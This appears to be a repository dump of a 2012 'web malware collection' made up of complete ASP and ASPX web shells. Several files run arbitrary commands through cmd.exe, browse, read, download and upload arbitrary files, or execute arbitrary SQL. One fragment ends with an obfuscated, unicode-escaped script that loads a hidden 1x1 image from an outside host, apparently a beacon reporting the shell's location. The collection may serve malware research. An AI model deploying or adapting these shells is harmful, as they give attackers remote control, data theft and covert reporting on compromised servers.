Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
For each fold in folder.SubFolders '-->FOLDERz
fo=fo+1
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.name & "</span></FONT><BR>"
Next
%>
<BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
<table bgcolor=#505050 cellspacing=4><tr><td>
<font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
<tr><td align=right ><input type=text size=20 name=DirName><BR>
<input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
</tr></td></table></form>
<%
Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
Response.Flush
%>
<form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
<%
Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
For each file in folder.Files '-->FILEz
Response.Write "<option value=""" & file.name & """>&nbsp;&nbsp;" & file.name & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
Next
Response.write "</select>"
Response.write "<br><input type=submit name=cmd value="" Copy ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
%>
</form>
<%
Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
' ---View Tree Ends Here
' ---Upload Routine starts here
%>
<form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
<table bgcolor="#505050" cellpadding="8">
<tr>
<td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
<input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
&nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
</font></td>
</tr>
</table>
<BR>
<table bgcolor="#505050" cellpadding="6">
<tr>
<td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER&nbsp; FOR THIS LIBRARY TO
FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET
EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td>
</tr>
</table>
</form>
<%
' ---Upload Routine stops here
%>
</font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
</body></html>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>

53
web-malware-collection-13-06-2012/ASP/cmd.asp Normal file
View file

@ -0,0 +1,53 @@
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

37
web-malware-collection-13-06-2012/ASP/cmd.aspx Normal file
View file

@ -0,0 +1,37 @@
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xcmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","&lt;")
mystring=replace(mystring,">","&gt;")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>

82
web-malware-collection-13-06-2012/ASP/cmdexec.aspx Normal file
View file

@ -0,0 +1,82 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string HEADER = "<html>\n<head>\n<title>command</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
Response.Write(HEADER);
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(this.ExecuteCommand(txtCommand.Text)));
Response.Write("</pre>");
Response.Write(FOOTER);
}
/// <summary>
///
/// </summary>
/// <param name="command"></param>
/// <returns></returns>
private string ExecuteCommand(string command)
{
try
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "cmd.exe";
processStartInfo.Arguments = "/c " + command;
processStartInfo.RedirectStandardOutput = true;
processStartInfo.UseShellExecute = false;
Process process = Process.Start(processStartInfo);
using (StreamReader streamReader = process.StandardOutput)
{
string ret = streamReader.ReadToEnd();
return ret;
}
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>Command</title>
</head>
<body>
<form id="formCommand" runat="server">
<div>
<table>
<tr>
<td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td>
<td><asp:TextBox ID="txtCommand" runat="server" Width="820px"></asp:TextBox></td>
</tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woany.co.uk) -->

2324
web-malware-collection-13-06-2012/ASP/elmaliseker.asp Normal file
View file

File diff suppressed because it is too large Load diff

189
web-malware-collection-13-06-2012/ASP/filesystembrowser.aspx Normal file
View file

@ -0,0 +1,189 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script Language="c#" runat="server">
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "download")
{
Response.Write(HEADER);
Response.Write(this.DownloadFile());
Response.Write(FOOTER);
}
else if (Request.Params["operation"] == "list")
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string DownloadFile()
{
try
{
if (Request.Params["file"] == null)
{
return "No file supplied";
}
string file = Request.Params["file"];
if (File.Exists(file) == false)
{
return "File does not exist";
}
Response.ClearContent();
Response.ClearHeaders();
Response.Clear();
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(file));
Response.AddHeader("Content-Length", new FileInfo(file).Length.ToString());
Response.WriteFile(file);
Response.Flush();
Response.Close();
return "File downloaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
private string OutputList()
{
try
{
StringBuilder response = new StringBuilder();
string dir = string.Empty;
if (Request.Params["directory"] == null)
{
string[] tempDrives = Environment.GetLogicalDrives();
if (tempDrives.Length > 0)
{
for (int index = 0; index < tempDrives.Length; index++)
{
try
{
dir = tempDrives[index];
break;
}
catch (IOException){}
}
}
}
else
{
dir = Request.Params["directory"];
}
if (Directory.Exists(dir) == false)
{
return "Directory does not exist";
}
// Output the available drives
response.Append("<table><tr>");
response.Append("<td>Drives</td>");
string[] drives = Environment.GetLogicalDrives();
foreach (string drive in drives)
{
response.Append("<td><a href=");
response.Append("?directory=");
response.Append(drive);
response.Append("&operation=list>");
response.Append(drive);
response.Append("</a></td>");
}
// Output the current path
response.Append("</tr></table><table><tr><td>&nbsp;</td></tr>");
response.Append("<tr><td>..&nbsp;&nbsp;&nbsp;<a href=\"?directory=");
string parent = dir;
DirectoryInfo parentDirInfo = Directory.GetParent(dir);
if (parentDirInfo != null)
{
parent = parentDirInfo.FullName;
}
response.Append(parent);
response.Append("&operation=list\">");
response.Append(parent);
response.Append("</a></td></tr></table><table>");
// Output the directories
System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.DirectoryInfo dirs in dirInfo.GetDirectories("*.*"))
{
response.Append("<tr><td>dir&nbsp;&nbsp;<a href=\"?directory=" + dirs.FullName + "&operation=list\">" + dirs.FullName + "</a></td></tr>");
}
// Output the files
dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.FileInfo fileInfo in dirInfo.GetFiles("*.*"))
{
response.Append("<tr><td>file&nbsp;<a href=\"?file=" + fileInfo.FullName + "&operation=download\">" + fileInfo.FullName + "</a></td><td>");
response.Append(fileInfo.Length);
response.Append("</td></tr>");
}
response.Append("</table>");
return response.ToString();
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<!-- Created by Mark Woan (http://www.woany.co.uk) -->

98
web-malware-collection-13-06-2012/ASP/fileupload.aspx Normal file
View file

@ -0,0 +1,98 @@
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "upload")
{
Response.Write(HEADER);
Response.Write(this.UploadFile());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string UploadFile()
{
try
{
if (Request.Files.Count != 1)
{
return "No file selected";
}
HttpPostedFile httpPostedFile = Request.Files[0];
int fileLength = httpPostedFile.ContentLength;
byte[] buffer = new byte[fileLength];
httpPostedFile.InputStream.Read(buffer, 0, fileLength);
FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
{
fileStream.Write(buffer, 0, buffer.Length);
}
return "File uploaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
/// <returns></returns>
private string GetUploadControls()
{
string temp = string.Empty;
temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
temp += "<p>Please specify a file: <input type=\"file\" name=\"file\"></p>";
temp += "<div><input type=\"submit\" value=\"Send\"></div>";
temp += "</form>";
return temp;
}
</script>
<!-- Created by Mark Woan (http://www.woany.co.uk) -->

79
web-malware-collection-13-06-2012/ASP/list.asp Normal file
View file

@ -0,0 +1,79 @@
<!--
ASP_KIT
list.asp = Directory & File View
by: darkraver
modified: 16/12/2005
-->
<body>
<html>
<%
file=request("file")
tipo=request("type")
If file="" then
file="c:\"
tipo="1"
End If
%>
<FORM action="" method="GET">
<INPUT TYPE="text" NAME="file" value="<%=file%>">
<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
<INPUT TYPE="submit" Value="Consultar">
</FORM>
<%
If tipo="1" then
Response.Write("<h3>PATH: " & file & "</h3>")
ListFolder(file)
End If
If tipo="2" then
Response.Write("<h3>FILE: " & file & "</h3>")
Set oStr = server.CreateObject("Scripting.FileSystemObject")
Set oFich = oStr.OpenTextFile(file, 1)
Response.Write("<pre>--<br>")
Response.Write(oFich.ReadAll)
Response.Write("<br>--</pre>")
End If
%>
<%
sub ListFolder(path)
set fs = CreateObject("Scripting.FileSystemObject")
set folder = fs.GetFolder(path)
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
for each item in folder.SubFolders
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
next
for each item in folder.Files
Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
next
end sub
%>
</body>
</html>

1013
web-malware-collection-13-06-2012/ASP/ntdaddy.asp Normal file
View file

File diff suppressed because it is too large Load diff

341
web-malware-collection-13-06-2012/ASP/spexec.aspx Normal file
View file

@ -0,0 +1,341 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnLogin_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataAdapter sqlDataAdapter = null;
sqlCommand = new SqlCommand("sp_stored_procedures", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "SPs");
cboSps.DataSource = dataSet.Tables["SPs"];
cboSps.DataTextField = "PROCEDURE_NAME";
cboSps.DataBind();
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
catch (Exception ex)
{
lblStatus.Text = ex.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnGetParameters_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
SqlCommand sqlCommand = new SqlCommand("sp_sproc_columns", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlCommand.Parameters.Add("@procedure_name", SqlDbType.NVarChar, 390).Value = cboSps.SelectedItem.Value;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "Parameters");
gridParameters.DataSource = dataSet.Tables["Parameters"];
gridParameters.DataBind();
gridResults.Visible = false;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
DataSet dataSet = new DataSet();
SqlCommand sqlCommand = new SqlCommand(cboSps.SelectedItem.Value, sqlConnection);
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
this.AddParameters(sqlCommand);
sqlDataAdapter.Fill(dataSet, "Results");
this.UpdateParameters(sqlCommand);
gridResults.DataSource = dataSet.Tables["Results"];
gridResults.DataBind();
gridResults.Visible = true;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void AddParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
switch (((TableCell)dataGridItem.Controls[1]).Text.ToLower())
{
case "bit":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Bit).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "bigint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.BigInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "char":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Char, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "datetime":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.DateTime).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "decimal":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Decimal).Value = decimal.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "float":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Float).Value = float.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "int":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Int).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NChar).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "ntext":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NText, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nvarchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NVarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "real":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Real).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "smallint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.SmallInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "tinyint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.TinyInt).Value = uint.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "varchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.VarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
default:
continue;
}
}
if (((TableCell)dataGridItem.Controls[5]).Text == "2")
{
sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Direction = ParameterDirection.InputOutput;
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void UpdateParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
((TableCell)dataGridItem.Controls[7]).Text = sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Value.ToString();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>Stored Procedure Execute</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="form1" runat="server">
<table>
<tbody>
<tr>
<td>
Database server:</td>
<td>
<asp:TextBox id="txtDatabaseServer" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
User id:</td>
<td>
<asp:TextBox id="txtUserId" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Password:</td>
<td>
<asp:TextBox id="txtPassword" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Database:</td>
<td>
<asp:TextBox id="txtDatabase" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
</td>
<td>
<asp:Button id="btnLogin" onclick="btnLogin_Click" runat="server" Text="Login"></asp:Button>
</td>
</tr>
<tr>
<td>
Stored procedures:</td>
<td>
<asp:DropDownList id="cboSps" runat="server"></asp:DropDownList>
</td>
</tr>
<tr>
<td>
</td>
<td>
<p>
<asp:Button id="btnGetParams" onclick="btnGetParameters_Click" runat="server" Text="Get Parameters"></asp:Button>
<asp:Button id="btnExecute" onclick="btnExecute_Click" runat="server" Text="Execute Query"></asp:Button>
</p>
</td>
</tr>
<tr>
<td>
Status:</td>
<td>
<asp:Label id="lblStatus" runat="server"></asp:Label></td>
</tr>
</tbody>
</table>
<p>
<asp:DataGrid id="gridParameters" runat="server" AutoGenerateColumns="False">
<Columns>
<asp:BoundColumn DataField="column_name" HeaderText="Name"></asp:BoundColumn>
<asp:BoundColumn DataField="type_name" HeaderText="Type"></asp:BoundColumn>
<asp:BoundColumn DataField="length" HeaderText="Length"></asp:BoundColumn>
<asp:BoundColumn DataField="precision" HeaderText="Precision"></asp:BoundColumn>
<asp:BoundColumn DataField="scale" HeaderText="Scale"></asp:BoundColumn>
<asp:BoundColumn DataField="column_type" HeaderText="Column Type"></asp:BoundColumn>
<asp:TemplateColumn HeaderText="Input Value">
<ItemTemplate>
<asp:TextBox ID="TextBox1" runat="server"></asp:TextBox>
</ItemTemplate>
</asp:TemplateColumn>
<asp:BoundColumn HeaderText="Output Value"></asp:BoundColumn>
</Columns>
</asp:DataGrid>
</p>
<p>
<asp:DataGrid id="gridResults" runat="server"></asp:DataGrid>
</p>
<p>
</p>
<p>
<a href="spexec.aspx">Restart</a>
</p>
</form>
</body>
</html>

94
web-malware-collection-13-06-2012/ASP/sql.aspx Normal file
View file

@ -0,0 +1,94 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = txtConnection.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataReader sqlDataReader = null;
sqlCommand = new SqlCommand(txtSql.Text, sqlConnection);
sqlCommand.CommandType = CommandType.Text;
sqlDataReader = sqlCommand.ExecuteReader();
StringBuilder output = new StringBuilder();
output.Append("<table width=\"100%\" border=\"1\">");
while (sqlDataReader.Read())
{
output.Append("<tr>");
int colCount = sqlDataReader.FieldCount;
for (int index = 0; index < colCount; index++)
{
output.Append("<td>");
output.Append(sqlDataReader[index].ToString());
output.Append("</td>");
}
output.Append("</tr>");
output.Append(Environment.NewLine);
}
output.Append("</table>");
Literal1.Text = output.ToString();
}
catch (SqlException sqlEx)
{
Response.Write(sqlEx.ToString());
}
catch (Exception ex)
{
Response.Write(ex.ToString());
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>SQL</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="formSql" runat="server">
<div>
<table width="100%">
<tr><td><asp:TextBox ID="txtConnection" runat="server" Height="15px" Width="100%"></asp:TextBox></td>
</tr>
<tr><td><asp:TextBox ID="txtSql" runat="server" Height="258px" Width="100%"></asp:TextBox></td>
</tr>
<tr><td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td>
</tr>
<tr><td>
<asp:Literal ID="Literal1" runat="server"></asp:Literal></td>
</tr>
</table>
</div>
</form>
</body>
</html>

792
web-malware-collection-13-06-2012/ASP/tool.asp Normal file
View file

@ -0,0 +1,792 @@
<%@ LANGUAGE = VBScript.Encode %>
<%
On Error Resume Next
Server.ScriptTimeOut = 7200
